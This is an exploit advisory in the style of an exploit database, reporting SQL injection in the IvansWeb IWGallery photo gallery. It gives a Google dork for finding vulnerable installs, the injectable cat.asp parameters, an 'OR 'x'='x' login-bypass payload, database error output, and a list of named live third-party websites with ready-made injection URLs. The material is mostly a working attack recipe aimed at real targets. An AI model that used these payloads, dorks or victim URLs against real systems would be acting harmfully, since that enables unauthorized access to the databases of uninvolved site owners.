#################################################################################################
# Exploit Title : Powered by IvansWeb IWGallery PhotoGallery © 2005/2007 SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Vendor Homepages : ivansweb.com ~ iwgallery.com ~ github.com/ingowalther ~ iwstudio.it
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Powered by IvansWeb - All Rights Reserved © 2005/2007''
intext:''Vietata la riproduzione anche parziale delle immagini'' /iwgallery/
# Exploits :
/iwgallery/pictures/cat.asp?iCat=[ID-NUMBER]&offset=[SQL Inj]
/iwgallery/pictures/cat.asp?iCat=[SQL Inj]
# Admin Login Panel : /admin/login.asp
# When try to enter Admin Panel through the SQL Authentication Bypass with this exploit
anything' OR 'x'='x an SQL Injection error occurs.
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near '?èÂ'.
/admin/login.asp, line 68
#################################################################################################
# Example Sites =>
icmpetroli.it/iwgallery/pictures/cat.asp?iCat=01&offset=6%27
arcobalenobeb.com/iwgallery/pictures/cat.asp?iCat=1%27
assicurazionipassera.it/iwgallery/pictures/cat.asp?iCat=2%27
studioegmsrl.it/iwgallery/pictures/cat.asp?iCat=9%27
ospacralaslromag.it/iwgallery/pictures/cat.asp?iCat=1%27
[ Proof of Concept for SQL Inj ] => archive.is/t7UlF
# SQL Database Error =>
Microsoft VBScript runtime error '800a000d'
Type mismatch: '[string: "6%27"]'
/iwgallery/pictures/inc_cat.asp, line 224
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################